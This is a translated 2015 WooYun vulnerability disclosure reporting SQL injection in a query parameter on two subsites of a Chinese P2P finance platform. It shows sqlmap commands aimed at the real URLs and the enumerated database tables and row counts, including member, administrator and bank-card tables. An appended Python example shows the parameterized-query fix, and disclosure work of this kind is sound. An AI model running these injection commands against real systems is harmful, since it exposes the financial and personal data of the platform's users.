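2015-09-29: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-11-13: The vendor has chosen to ignore the vulnerability; details disclosed to the public
This parameter is injectable on the main site, and the same parameter is injectable on the subsites too. If you don't fix it, the amount of data that can be obtained will only grow!
An expert really is an expert, and a great tool really is a great tool. I tried looking and testing but found nothing; it was still the parameter the expert had already submitted. Seeing that 路人甲 had posted the main-site issue, I wondered whether the subsites had the same injectable parameter.
WooYun: High-risk vulnerability on the main site of P2P finance platform Picheng Jinrong (皮城金融) (information on more than ten thousand investors obtainable)
Sure enough, both subsites are injectable.
Injection point 1: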
https://m.pcjinrong.com/footer/get?type=1
The type parameter is injectable.
sqlmap.py -u "https://m.pcjinrong.com/footer/get?type=1" --threads 10 --current-db --current-user --is-dba
Database: db_pcjr
[45 tables]
+---------------------------+
| hc_account_log            |
| hc_activity               |
| hc_admin                  |
| hc_adv                    |
| hc_adv_position           |
| hc_article                |
| hc_article_class          |
| hc_balance_log            |
| hc_bank_card              |
| hc_borrower               |
| hc_borrower_company       |
| hc_borrower_person        |
| hc_cooperation            |
| hc_customer_service       |
| hc_draw_vote              |
| hc_draw_vote_log          |
| hc_float_income           |
| hc_group_letter           |
| hc_group_letter_read      |
| hc_guarantors             |
| hc_invest                 |
| hc_invest_ticket          |
| hc_join                   |
| hc_letter                 |
| hc_member                 |
| hc_message                |
| hc_midnight_balance       |
| hc_pay_log                |
| hc_permission             |
| hc_preview_buy            |
| hc_product                |
| hc_recharge               |
| hc_repayment_borrower     |
| hc_repayment_invest       |
| hc_session                |
| hc_sms_log                |
| hc_trading_record         |
| hc_withdraw_deposit       |
| hc_withdraw_log           |
| hc_wx_config              |
| hc_wx_errlogin            |
| hc_wx_keyword             |
| hc_wx_menu                |
| hc_wx_root                |
| hc_yesterday_product_info |
+---------------------------+

Database: db_pcjr
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| hc_sms_log                | 55808   |
| hc_pay_log                | 55640   |
| hc_account_log            | 47648   |
| hc_balance_log            | 47573   |
| hc_recharge               | 41409   |
| hc_repayment_invest       | 35050   |
| hc_letter                 | 30289   |
| hc_draw_vote_log          | 26246   |
| hc_member                 | 14829   |
| hc_trading_record         | 13002   |
| hc_withdraw_deposit       | 5537    |
| hc_bank_card              | 5247    |
| hc_invest_ticket          | 2304    |
| hc_repayment_borrower     | 703     |
| hc_group_letter_read      | 348     |
| hc_product                | 224     |
| hc_midnight_balance       | 178     |
| hc_session                | 152     |
| hc_borrower_person        | 138     |
| hc_yesterday_product_info | 104     |
| hc_preview_buy            | 98      |
| hc_permission             | 92      |
| hc_cooperation            | 73      |
| hc_article                | 69      |
| hc_draw_vote              | 67      |
| hc_withdraw_log           | 43      |
| hc_wx_keyword             | 42      |
| hc_borrower_company       | 25      |
| hc_admin                  | 24      |
| hc_article_class          | 9       |
| hc_wx_menu                | 9       |
| hc_wx_errlogin            | 8       |
| hc_activity               | 7       |
| hc_guarantors             | 5       |
| hc_group_letter           | 1       |
| hc_wx_config              | 1       |
| hc_wx_root                | 1       |
+---------------------------+---------+

| hc_sms_log                | 55808   |
| hc_pay_log                | 55640   |
| hc_account_log            | 47648   |
| hc_member                 | 14829   |
| hc_admin                  | 24      |
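Tens of thousands of data records: more than ten thousand users, 24 administrators, and over fifty thousand log records. If this is not fixed, I expect there will be even more before long! Please fix it quickly!
Injection point 2: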
http://wx.pcjinrong.com/footer/get?type=1
Again, the type parameter is injectable.
sqlmap.py -u "http://wx.pcjinrong.com/footer/get?type=1" --threads 10
The test results are the same as for the first injection point, so I did not continue!
Filter it!
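An added example (not part of the original report and not the vendor's code) of what the fix for a numeric parameter such as type looks like: the concatenated query next to a handler that validates the value and binds it as a parameter. The footer table, its columns, the function names and the sample rows are assumptions constructed for illustration; the real schema and backend language behind /footer/get are not given on the page.

```python
import sqlite3


def make_db():
    # Constructed sample data; the real table behind /footer/get is unknown.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE footer (id INTEGER PRIMARY KEY, type INTEGER, body TEXT)")
    db.executemany(
        "INSERT INTO footer (type, body) VALUES (?, ?)",
        [(1, "about"), (1, "contact"), (2, "internal note")],
    )
    return db


def get_footer_vulnerable(db, type_param):
    # Anti-pattern: the query-string value becomes part of the SQL text,
    # so the database parses whatever the client sent as SQL.
    sql = "SELECT body FROM footer WHERE type = " + type_param
    return [row[0] for row in db.execute(sql)]


def parse_type(type_param):
    # Allow-list validation: accept only a short run of ASCII digits.
    if not (type_param.isascii() and type_param.isdigit() and len(type_param) <= 4):
        raise ValueError("type must be a non-negative integer")
    return int(type_param)


def get_footer_hardened(db, type_param):
    # Validate first, then bind the value; the SQL text never changes.
    value = parse_type(type_param)
    cur = db.execute("SELECT body FROM footer WHERE type = ? ORDER BY id", (value,))
    return [row[0] for row in cur]


def rejected(db, type_param):
    # Helper for checks: True when the hardened handler refuses the input.
    try:
        get_footer_hardened(db, type_param)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    constructed = "1 OR 1=1"  # constructed non-numeric input
    print("vulnerable:", get_footer_vulnerable(db, constructed))
    print("hardened rejects:", rejected(db, constructed))
    print("hardened, type=1:", get_footer_hardened(db, "1"))
```

Parameter binding is the actual fix; the input check on top of it keeps malformed values out of the query path and gives a clean point to log rejected requests.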
Unable to contact the vendor, or the vendor actively refused
Vulnerability Rank: 15 (WooYun rating)